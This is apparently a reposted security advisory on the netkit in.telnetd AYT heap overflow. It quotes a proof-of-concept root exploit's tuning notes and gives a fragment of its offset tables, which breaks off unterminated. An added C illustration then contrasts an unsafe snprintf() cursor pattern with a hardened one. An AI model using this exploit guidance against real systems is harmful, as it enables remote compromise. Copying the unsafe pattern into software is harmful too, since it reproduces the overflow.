Linux netkit in.telnetd remote overflow vulnerability

2008-04-09 04:30:32 Source: Internet

Affected systems:
- Red Hat Linux 5.2
- Red Hat Linux 6.2
- Red Hat Linux 7.0
- Red Hat Linux 7.1
- Debian Linux 2.2 alias potato

Description: The telnetd shipped with many operating systems was found to contain an AYT buffer overflow.

The original advisory stated that Linux netkit-telnetd >= 0.14 was not affected by this problem, but more recent reports show that all Linux netkit-telnetd versions <= 0.17 are affected. The problem likewise lies in the handling of the telnet protocol ...

Test method: Warning

zen-parse provided the following test code:

Proof of concept netkit-0.17-7 local root exploit.

Exploits buffer overflow in the AYT handling of in.telnetd, due to bad logic in the handling of snprintf(), and TESO advisory details were enough to allow me to put controllable addresses in arbitrary heap locations.

Heap based exploit. Overflow allows rewriting of some heap data, which allowed me to put a new heap structure in the input buffer, which let me do whatever I want.

'traceroute exploit story - By Dvorak, Synnergy Networks' was very helpful. Also malloc.c was good.

Notes about exploit

1) RedHat 7.0, exploiting localhost
2) hostname is clarity.local
3) It probably won't work without at least a different setting for the --size option, and probably the --name option as well. The --name argument is the hostname part of the string that gets returned by the AYT command, which may be different to the name of the address you are connecting to.
4) There are a lot of things that use the heap, making the size depend on a lot of factors.
5) You might need to change some (or all) of the offsets.

This program does allow you to brute force, if the hostname returned by the AYT command is not a multiple of 3 letters long.

It is also possibly (at least according to some quick testing I did) exploitable on some (all?) servers with names that are multiples of three letters long, using the Abort Output command to add 2 characters to the output length, and exploit the heap in a similar manner to this method. (You can only directly put user controllable characters in 2 out of 3 locations (i.e. no AO will give you a multiple of 3 bytes on the heap, AO will give you 2 more than a multiple of 3 bytes) with controllable characters, but when you count the null added by the netoprintf(), and use 0 as an option to a do or will, you can sometimes create valid chunks that point to locations you can control. I have only tested this method with a simulation, but it seems it would probably work with the telnetd as well. I will look into it when I have time. Maybe.)


#define SERVER_PORT 23
#define ENV 18628

int offset12[] = {
    // netibuf[343]->the chunk start.
    -4, 0xaa,
    -5, 0xbb,
    -6, 0xcc,
    -7, 0x10,
    -9, 0xdd,
    -10, 0x68,
    -12, 0xee,
    -13, 0x88,
    -14, 0x99,
    0, 0x00
};

int offset3[]={
    /* entries not preserved in this copy of the code */

int *offsets=offset12;
int dalen = 0;
int big;
int small;
int mipl = 0;
int ninbufoffset;
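zen-parse's notes above attribute the overflow to bad logic around snprintf(). The block below is an added illustration of that defect class, not code from the advisory or from netkit: the buffer, field names and sizes are constructed assumptions modelled loosely on a daemon's output buffer, and it shows why advancing a write cursor by snprintf()'s return value is wrong and how checking that value against the space actually available prevents the overshoot.

```c
#include <stdio.h>
#include <stdarg.h>
#include <string.h>

/* Constructed output buffer (assumption, not the daemon's real layout):
 * a fixed array plus a write cursor, like a "front pointer" into it. */
#define OBUF_SIZE 32

struct obuf {
    char data[OBUF_SIZE];
    size_t front;            /* index of the next free byte */
};

/* Vulnerable pattern: treat snprintf()'s return value as "bytes written".
 * C99 vsnprintf returns the length the complete string WOULD have had, so
 * when the message is truncated the cursor jumps past the end of the buffer.
 * The very next append then computes a wrapped "space left" and writes out
 * of bounds. */
size_t obuf_append_unsafe(struct obuf *b, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(b->data + b->front, OBUF_SIZE - b->front, fmt, ap);
    va_end(ap);
    b->front += (size_t)len;   /* BUG: front may now exceed OBUF_SIZE */
    return b->front;
}

/* Hardened pattern: compare the return value with the space that was
 * available; on truncation undo the partial write and report failure so
 * the caller can drain the buffer and retry instead of corrupting memory. */
int obuf_append_safe(struct obuf *b, const char *fmt, ...)
{
    va_list ap;
    size_t avail = OBUF_SIZE - b->front;
    va_start(ap, fmt);
    int len = vsnprintf(b->data + b->front, avail, fmt, ap);
    va_end(ap);
    if (len < 0 || (size_t)len >= avail) {
        b->data[b->front] = '\0';   /* discard the truncated fragment */
        return -1;
    }
    b->front += (size_t)len;
    return len;
}

/* Space the next write would be offered; after the unsafe overshoot this
 * size_t subtraction wraps to a huge value. */
size_t obuf_space(const struct obuf *b) { return OBUF_SIZE - b->front; }
```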